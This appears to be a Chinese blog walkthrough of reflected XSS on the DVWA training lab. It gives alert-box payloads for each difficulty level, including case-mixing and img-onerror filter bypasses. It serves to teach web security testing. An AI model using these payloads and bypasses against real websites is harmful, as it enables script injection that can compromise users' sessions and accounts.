一、什么是XSS reflect
XSS反射型攻击,恶意代码并没有保存在目标网站,通过引诱用户点击一个链接到目标网站的恶意链接来实施攻击的。
二、DVWA 实战
1、low难度
没有进行任何过滤,那么直接写js代码
<script>alert('hack')</script>
![在这里插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/4dc7615344e050492c064d24263d44a1.png)
2、medium 难度
直接输入 被过滤掉了。
![在这里插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/5bec2fa64cc9cdd1a25a248eef160a57.png)
使用大小写即可绕过,
<sCript>alert('hack')</Script>
![在这里插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/d60410737d7ad11d727a91da6a1b723c.png)
3、high 难度
script标签被过滤了。改用img标签,即可绕过。
<img src=1 onerror=alert('hack')>
![在这里插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/46b5b1281bf937e867aefa7eae83805b.png)